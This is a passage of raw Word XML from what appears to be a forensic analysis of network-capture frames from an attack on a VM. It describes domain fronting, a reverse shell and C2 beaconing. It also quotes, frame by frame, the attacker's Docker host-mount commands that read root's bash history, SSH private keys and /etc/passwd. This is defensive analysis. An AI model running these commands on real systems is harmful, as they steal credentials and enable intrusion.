      <w:r w:rsidR="2373777D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r w:rsidR="77A0AE2E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="579DC101" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="33C404F5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455CBA53" w14:textId="0F47238C" w:rsidR="48D81DD1" w:rsidRDefault="48D81DD1" w:rsidP="1DD92F8E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EB86737" wp14:editId="173DAE20">
            <wp:extent cx="4572000" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39272923" name="Imagem 3927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615" w14:textId="3897AC95" w:rsidR="7BE35D06" w:rsidRDefault="7BE35D06" w:rsidP="1DD92F8E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1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>From this frame, we can also spot a new IP from the attacker “96.127.23.115”, however</w:t>
      </w:r>
      <w:r w:rsidR="3276C32C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, this IP belongs to Amazon AWS</w:t>
      </w:r>
      <w:r w:rsidR="71AFF6D6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. This probably means that the attacker is using domain fronting to hide himself</w:t>
      </w:r>
      <w:r w:rsidR="0940B83D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A8EBEF" w14:textId="1FD14E17" w:rsidR="5F3328DF" w:rsidRDefault="5F3328DF" w:rsidP="1DD92F8E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1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The use of domain fronting and</w:t>
      </w:r>
      <w:r w:rsidR="78FD1E1E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell show a c2 beaconing </w:t>
      </w:r>
      <w:r w:rsidR="59C625EA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>communication</w:t>
      </w:r>
      <w:r w:rsidR="25F3A62C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F78DA0D" w14:textId="28BDBA50" w:rsidR="41B1CA1D" w:rsidRDefault="41B1CA1D" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>There w</w:t>
      </w:r>
      <w:r w:rsidR="32B299DA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ere</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> no indicator</w:t>
      </w:r>
      <w:r w:rsidR="79731726" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that this method worked though, since no TCP</w:t>
      </w:r>
      <w:r w:rsidR="740DB4A8" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(syn) started from the VM</w:t>
      </w:r>
      <w:r w:rsidR="7A744B0C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> probably because </w:t>
      </w:r>
      <w:r w:rsidR="011F36D7" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the line added to crontab</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> was coded </w:t>
      </w:r>
      <w:r w:rsidR="5787CE2F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bash syntax and the crontab was working with shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1424C568" w14:textId="5394100F" w:rsidR="0940B83D" w:rsidRDefault="0940B83D" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs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24755 – 19:23 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D40C3F0" w14:textId="4F027B59" w:rsidR="0940B83D" w:rsidRDefault="0940B83D" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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“docker run --rm -v /:/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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat 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>/root/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bash_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” but gets nothing in return.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB115E" w14:textId="5CB60037" w:rsidR="2155ABC5" w:rsidRDefault="2155ABC5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</w:t>
      </w:r>
      <w:r w:rsidR="6D2F7DAC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:23 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017305BA" w14:textId="3877330B" w:rsidR="2155ABC5" w:rsidRDefault="2155ABC5" w:rsidP="1DD92F8E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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sends command “docker run --rm -v /:/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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cat 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>/root/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/root/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/id_rsa.pub</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F92759E" w14:textId="3DFF0421" w:rsidR="5854F1E3" w:rsidRDefault="5854F1E3" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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>Because of</w:t>
      </w:r>
      <w:r w:rsidR="2155ABC5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> this frame, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="4BECE32C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="13BF6F56" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>athers the public and private</w:t>
      </w:r>
      <w:r w:rsidR="2155ABC5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="2155ABC5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="2155ABC5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="25F90758" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>openssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="25F90758" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2155ABC5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidR="5A9C06B7" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="2155ABC5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC56182" w14:textId="48B33E58" w:rsidR="0DDD0B14" w:rsidRDefault="0DDD0B14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 xml:space="preserve">Frame </w:t>
      </w:r>
      <w:r w:rsidR="72852CFA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>24779 – 19:23 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B75F422" w14:textId="51A0B4C6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“docker run --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rm </w:t>
      </w:r>
      <w:r w:rsidR="77B53D81" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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Pr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/home” and receives the </w:t>
      </w:r>
      <w:r w:rsidR="3B498C29" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>result of a normal ls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A44584B" w14:textId="3C21A134" w:rsidR="72852CFA" w:rsidRDefault="72852CF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</w:t>
      </w:r>
      <w:r w:rsidR="01C5C533" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9 – 19:23 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA9CA54" w14:textId="2DE0F2ED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</w:t>
      </w:r>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run</w:t>
      </w:r>
      <w:r w:rsidR="1F135247" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rm </w:t>
      </w:r>
      <w:r w:rsidR="1F135247" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="41B0228D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41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="41B0228D"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="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/home/dev/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/home/dev/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="41B0228D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/id_rsa.pub</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="2CC1A22F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and nothing happen</w:t>
      </w:r>
      <w:r w:rsidR="54880C60" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51883542" w14:textId="304FA0A4" w:rsidR="72852CFA" w:rsidRDefault="72852CF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247</w:t>
      </w:r>
      <w:r w:rsidR="37BC91D9" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9 – 19:2</w:t>
      </w:r>
      <w:r w:rsidR="3E75BACE" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4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6F7786E4" w14:textId="4CE162C6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lastRenderedPageBreak/>
        <w:t>Sends command “</w:t>
      </w:r>
      <w:r w:rsidR="366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>docker run --</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rm  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="366B03D1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366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>busybox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="366B03D1"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="366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="366B03D1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="1273F3D3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and gets the normal cat result for this file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D0A92" w14:textId="0734A6FC" w:rsidR="72852CFA" w:rsidRDefault="72852CF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</w:t>
      </w:r>
